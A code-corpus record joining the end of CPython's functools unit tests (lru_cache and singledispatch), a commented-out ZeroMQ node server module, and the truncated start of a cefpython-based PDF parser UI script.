def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
# FIXME: The following will only work after PEP 560 is implemented.
return
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
if __name__ == '__main__':
unittest.main()
|
server.py | # import threading
# import time
# import zmq
# from tornado.ioloop import IOLoop
# from .zhelpers import zpipe
# from .agent import NodeAgent
# from ..data.models import Device, DeviceRequest
# class NodeServer(object):
# ctx = None # Our Context
# pipe = None # Pipe through to flciapi agent
# agent = None # agent in a thread
# identity = b'localhost'
# servers = {}
# def __init__(self, identity=b'localhost'):
# self.identity = identity
# self.name = identity.decode('utf-8')
# self.ctx = zmq.Context()
# self.pipe, peer = zpipe(self.ctx)
# self.agent = threading.Thread(target=self.run_server, args=(self.ctx,peer))
# self.agent.daemon = True
# self.agent.name = f"Node{self.name}"
# self.agent.start()
# time.sleep(0.5) # Allow connection to come up
# def __init__(self, ctx, name, **kwargs):
# print(f'DEVICE NAME = {name}', flush=True)
# if type(name) == bytes:
# self.identity = name
# self.name = name.decode('utf-8')
# else:
# self.name = name
# self.identity = name.encode('ascii')
# self.data_handlers = []
# self.task_queue = Queue()
# self.current_task = {}
# self.state = {}
# self.events = []
# # self.ping_at = time.time() + 1e-3*PING_INTERVAL
# # self.expires = time.time() + 1e-3*SERVER_TTL
# zmq.Context()
# self.ctx = ctx #zmq.Context()
# self.pusher = self.ctx.socket(zmq.PUSH)
# self.pusher.connect(f"ipc://collector")
# # self.ctx = zmq.Context()
# deid = f"inproc://{self.identity}_collector"
# self.data_stream = self.ctx.socket(zmq.PULL)
# # print(f'BEFORE CONNECT COLLECTOR NAME = {deid}', flush=True)
# self.data_stream.bind(deid)
# time.sleep(0.1)
# self.data_stream = ZMQStream(self.data_stream)
# # self.data_stream.stop_on_recv()
# self.event_stream = self.ctx.socket(zmq.SUB)
# self.event_stream.connect("ipc://publisher")
# self.event_stream = ZMQStream(self.event_stream)
# self.event_stream.on_recv(self.on_message)
# def add_device(self, kind, endpoint, identity = None):
# if identity == None:
# identity = endpoint
# # print("identity = ", identity)
# self.pipe.send_multipart([b"CONNECT_DEVICE", kind.encode('ascii'), endpoint.encode('ascii'), identity.encode('ascii')])
# reply = self.pipe.recv_multipart()
# # print("ADD DEVICE REPLY", reply)
# # time.sleep(0.1) # Allow connection to come up
# name, status, msg = reply
# return {"name": name.decode('utf-8'), "status": status.decode('utf-8'), "msg": msg.decode('utf-8')}
# # return reply
# # def add_client(self, endpoint, identity = None):
# # """Connect to new server endpoint
# # Sends [CONNECT][endpoint] to the agent
# # """
# # if identity == None:
# # identity = endpoint
# # print("identity = ", identity)
# # self.pipe.send_multipart([b"CONNECT_LOCAL_PRINTER", endpoint.encode('ascii'), identity.encode('ascii')])
# # time.sleep(0.1) # Allow connection to come up
# def device_request(self, msg):
# # print("Send request, get reply")
# request = [b"DEVICE_REQUEST"] + msg
# self.pipe.send_multipart(request)
# reply = self.pipe.recv_multipart()
# ident, status, msg = reply
# # return [status.decode('utf-8'), msg.decode('utf-8')]
# return msg.decode('utf-8')
# def request(self, msg):
# # print("Send request, get reply")
# request = [b"REQUEST"] + msg
# self.pipe.send_multipart(request)
# reply = self.pipe.recv_multipart()
# status, msg = reply
# return msg.decode('utf-8')
# # return [status.decode('utf-8'), msg.decode('utf-8')]
# # return reply
# # status = reply.pop(0)
# # if status != "FAILED":
# # return reply
# def run_server(self, ctx, pipe):
# print("INSIDE AGENT TASK", flush=True)
# loop = IOLoop().initialize(make_current=True)
# # loop = IOLoop.current(instance=True)
# router = ctx.socket(zmq.ROUTER)
# router.identity = self.identity
# router.bind("tcp://*:5556")
# time.sleep(0.5)
# agent = NodeAgent(ctx, pipe, router)
# # print("NODE_SERVER before publisher bind", flush=True)
# publisher = ctx.socket(zmq.PUB)
# publisher.bind("ipc://publisher")
# # publisher.bind("tcp://*:5557")
# # eventsubscriber = ctx.socket(zmq.SUB)
# # eventsubscriber.bind("ipc://subscriber")
# # print("NODE_SERVER before collector bind", flush=True)
# collector = ctx.socket(zmq.PULL)
# collector.bind("ipc://collector")
# # collector.bind("tcp://*:5558")
# sequence = 0
# kvmap = {}
# poller = zmq.Poller()
# poller.register(collector, zmq.POLLIN)
# poller.register(router, zmq.POLLIN)
# poller.register(agent.pipe, zmq.POLLIN)
# # poller.register(agent.router, zmq.POLLIN)
# print("INSIDE NODE SERVER", flush=True)
# while True:
# try:
# items = dict(poller.poll(1000))
# except:
# break # Interrupted4
# if agent.pipe in items:
# # print("INSIDE AGENT PIPE", flush=True)
# agent.control_message()
# # print("GET ITEMS", flush=True)
# # Apply state update sent from devices
# if collector in items:
# msg = collector.recv_multipart()
# publisher.send_multipart(msg)
# if len(msg) >= 3:
# topic, device, *other = msg
# # topic, device, payload, *other = msg
# if topic.startswith(b'events.'):
# publisher.send_multipart([device + b'.' + topic, device] + other)
# # publisher.send_multipart([device + b'.' + topic, device, payload])
# # print(f"INSIDE SERVER COLLECTOR {msg}", flush=True)
# # publisher.send_multipart(msg)
# # Execute state snapshot request
# if router in items:
# # print("RECEIVED ITEM in server", flush=True)
# agent.router_message(router)
# # print("OUTSIDE NODE WHILE LOOP", flush=True)
# router.close()
# publisher.close()
# collector.close()
# ctx.term() |
ui.py | from cefpython3 import cefpython as cef
import base64
import platform
import sys
import threading
import subprocess
import glob
import time
import queue
import re
import pickle
from Abstract import Parser
parser = Parser()
wd = parser.getWD()
outF = parser.getOutF()
#parser.saveConfig()
# parser.fromTexttoXML('./dossier/Lin_2004_Rouge.txt')
# parser.fromTexttoTXT('./dossier/Lin_2004_Rouge.txt')
# parser.fromPDFtoXML('./dossier/Lin_2004_Rouge.pdf')
# parser.fromPDFtoTXT('./dossier/Lin_2004_Rouge.pdf')
#parser.loadConfig()
#parser.setDoTag('_CONCL', True)
#parser.setXMLTag('_CONCL', 'pickle')
#parser.setTXTTag('_CONCL', '\n[PICKLE]\n')
#parser.saveConfig()
APP_NAME = 'PDF Parser 1.1'
VERSION = parser.getVersion()
_DEBUG = True
TEAM = ['GRANIER Jean-Clair', 'BOUCHET Lucas', 'BARRIOL Rémy', 'WATTIN Tristan', 'MALEPLATE Bastien']
gl = parser.listDir()
files = []
FCNT = len(gl)
KBINDS = {',': 'Settings', 'Enter': 'Save/Start', 'Esc': 'Exit Settings', 'x': 'Toggle XML mode', 'r': 'Refresh', 's': 'Select all files / > Structures', 'c': '> Core', 'k': '> Keybind', 'a': '> About'}
_MESSAGE = ['','','No Files Found.']
ico_pdf = """<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M4 3v18h12l4-4V3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#f3f3f2" d="M2 5h8v6H2z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#f3f3f2" d="M3 6h6v3H3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<g fill="#bb2429">
<path fill="#a4b1b6" d="M5 4v1h13v10h-4v4H6v-8H5v9h10l4-4V4z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</g>
